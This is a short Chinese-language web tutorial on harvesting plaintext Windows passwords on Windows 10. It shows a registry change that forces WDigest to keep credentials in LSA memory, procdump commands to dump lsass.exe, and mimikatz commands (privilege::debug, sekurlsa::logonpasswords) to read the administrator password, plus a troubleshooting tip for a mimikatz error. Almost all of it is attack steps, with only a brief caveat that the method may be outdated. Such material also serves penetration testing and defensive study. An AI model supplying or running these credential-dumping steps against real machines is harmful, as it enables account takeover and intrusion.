您好,登錄后才能下訂單哦!
注:僅供參考,方法現在已不適用
工具:
procdump & mimikatz
實驗環境:
實驗主機:win10
賬戶密碼:17位復雜密碼(大小寫+特殊字符+數字)
(雖然微軟很早就更新了補丁來防止獲取windows的明文密碼,但是可以修改注冊表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的鍵值為1 即代表WDigest的密碼支持明文形式保存在LSA內存中)
步驟:
使用cmd運行procdump.exe
輸入:Procdump.exe -accepteula -ma lsass.exe lsass.dmp
使用cmd運行mimikatz.exe
輸入:privilege::debug
sekurlsa::logonpasswords
在wdigest:下顯示的就是管理員的密碼
補充:
如果按照網上的教程在mimikatz輸入指令這里100%報錯
(ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))
privilege::debug(提權)
sekurlsa::logonpasswords(抓密碼)
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。